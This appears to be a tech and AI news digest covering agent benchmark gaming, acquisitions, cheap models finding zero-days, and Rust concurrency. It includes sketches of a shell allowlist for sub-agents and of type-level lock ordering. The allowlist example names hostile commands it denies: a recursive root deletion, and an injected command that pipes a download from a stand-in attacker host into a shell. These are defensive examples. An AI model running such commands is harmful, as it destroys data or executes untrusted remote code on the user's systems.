Tech & AI Daily
Goldman Sachs, Citi, and others are piloting Anthropic's Mythos internally, and JPMorgan is named specifically in Project Glasswing. Separately, last week's Claude pricing changes apparently triggered a ban affecting OpenClaw users. If you depend on OpenClaw, check your access now.
RDI Berkeley found that leading agent benchmarks have been systematically gamed or are fundamentally flawed, casting serious doubt on how we measure agentic AI progress. If your agent stack is tuned against these numbers, real-world performance is probably not what you think.
Cirrus Labs, known for its CI/CD and cross-platform infrastructure tooling, is being absorbed by OpenAI. This signals OpenAI is building serious developer infrastructure muscle, not just model capabilities.
Meta's internal Avocado series kicks off with Muse Spark, the first model from its high-budget superintelligence research group, available only on Meta AI for now. We can't benchmark it independently yet, but the fact that this team is shipping at all is the real headline.
The post-Mythos story is that smaller, cheaper models found the same zero-days that Anthropic's flagship did, completely reframing the threat model from 'only frontier AI is dangerous' to 'this capability is already commoditized.' The defensive implications for agentic systems are serious and underappreciated right now. Anyone building tool-using agents needs to be thinking about what happens when an adversarially prompted sub-agent has access to a shell.
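One way to start thinking about the shell-access problem is to put a deny-by-default gate between the sub-agent and the shell. The sketch below is only an illustration under stated assumptions: ShellPolicy, Verdict, and the list of allowed programs are hypothetical names invented for this example, not part of any agent framework, and an allowlist like this is one layer of defense rather than a sandbox.

```rust
use std::collections::HashSet;

/// Hypothetical policy object: the only programs a sub-agent may invoke.
struct ShellPolicy {
    allowed_programs: HashSet<&'static str>,
}

/// Result of checking one command string against the policy.
#[derive(Debug, PartialEq)]
enum Verdict {
    Allow,
    Deny(String),
}

impl ShellPolicy {
    fn new(programs: &[&'static str]) -> Self {
        Self {
            allowed_programs: programs.iter().copied().collect(),
        }
    }

    /// Deny by default: a command passes only if it contains no shell
    /// metacharacters and its first token is an allowlisted program.
    fn check(&self, command: &str) -> Verdict {
        // Characters that enable chaining, substitution, or redirection.
        const META: &[char] = &[';', '|', '&', '$', '`', '>', '<', '(', ')', '\n'];
        if command.chars().any(|c| META.contains(&c)) {
            return Verdict::Deny("shell metacharacter in command".to_string());
        }

        // The program name is the first whitespace-separated token.
        let program = match command.split_whitespace().next() {
            Some(p) => p,
            None => return Verdict::Deny("empty command".to_string()),
        };

        if self.allowed_programs.contains(program) {
            Verdict::Allow
        } else {
            Verdict::Deny(format!("program '{}' is not allowlisted", program))
        }
    }
}
```

With a policy built from ShellPolicy::new(&["ls", "cat", "grep"]), a plain "ls -la /tmp" is allowed, while "rm -rf /" and "ls; curl evil.example | sh" are both denied. An allowlisted program such as cat can still read sensitive files, so a gate like this would need to sit alongside filesystem and network isolation.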
Q1's blockbuster: SpaceX absorbed xAI, Elon Musk's own AI company, at a $1.25 trillion valuation, which, if accurate, would make it the largest acquisition ever. Vertical consolidation of orbital infrastructure plus frontier AI is a very specific concentration of power worth keeping an eye on.
NASA's Artemis II lunar flyby mission returned safely, the first crewed deep-space mission since Apollo. Not a builder story, but it is the kind of thing worth pausing for.
South Korea is guaranteeing a baseline level of mobile data access to all citizens by law, a policy move that most Western governments would not touch. Interesting global precedent for digital rights and what connectivity-as-infrastructure looks like in practice.
Researchers demonstrated data storage at 447 TB per square centimeter with zero retention energy on a fluorographane substrate. Years from practical use, but the density numbers are genuinely staggering and the underlying physics is new.
Surelock enforces deadlock freedom at compile time using Rust's type system, which is exactly the kind of thing that should already exist in the stdlib. If you're writing concurrent Rust and tired of reasoning about lock ordering manually, this is worth a look.
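To give a feel for how a type system can rule out lock-ordering bugs, here is a minimal sketch of the general technique. It is not Surelock's API, which we have not reproduced here. Every name in it (L0, L1, L2, Below, Token, OrderedMutex, debit_with_audit) is hypothetical. The idea: each mutex carries a level in its type, and taking a lock requires a token proving that everything currently held sits at a strictly lower level.

```rust
use std::marker::PhantomData;
use std::sync::{Mutex, MutexGuard};

// Lock levels as zero-sized marker types. L0 means "nothing held yet".
struct L0;
struct L1;
struct L2;

// `A: Below<B>` encodes "level A is strictly lower than level B".
trait Below<Higher> {}
impl Below<L1> for L0 {}
impl Below<L2> for L0 {}
impl Below<L2> for L1 {}

// Proof of the highest lock level acquired so far.
struct Token<Level>(PhantomData<Level>);

impl Token<L0> {
    // Simplification: a real library would have to stop a thread from
    // minting several root tokens; this sketch does not.
    fn root() -> Self {
        Token(PhantomData)
    }
}

// A mutex tagged with its position in the global lock order.
struct OrderedMutex<Level, T> {
    inner: Mutex<T>,
    _level: PhantomData<Level>,
}

impl<Level, T> OrderedMutex<Level, T> {
    fn new(value: T) -> Self {
        Self { inner: Mutex::new(value), _level: PhantomData }
    }

    // Locking needs a token at a strictly lower level. That token stays
    // mutably borrowed for as long as the guard lives, so it cannot be
    // reused to take another lock out of order in the meantime.
    fn lock<'a, Held: Below<Level>>(
        &'a self,
        _held: &'a mut Token<Held>,
    ) -> (MutexGuard<'a, T>, Token<Level>) {
        (self.inner.lock().unwrap(), Token(PhantomData))
    }
}

// Takes the L1 lock, then the L2 lock. Swapping the two `lock` calls is
// rejected by the compiler because `L2: Below<L1>` is not implemented.
fn debit_with_audit(
    account: &OrderedMutex<L1, i64>,
    audit_log: &OrderedMutex<L2, Vec<String>>,
) -> i64 {
    let mut root = Token::<L0>::root();
    let (mut balance, mut at_l1) = account.lock(&mut root);
    let (mut log, _at_l2) = audit_log.lock(&mut at_l1);
    *balance -= 10;
    log.push(format!("debited 10, balance now {}", *balance));
    let new_balance = *balance;
    new_balance
}
```

Because every thread has to climb the levels in the same direction, no cycle of waiting threads can form among these locks. The cost is that the lock order is fixed up front in the types.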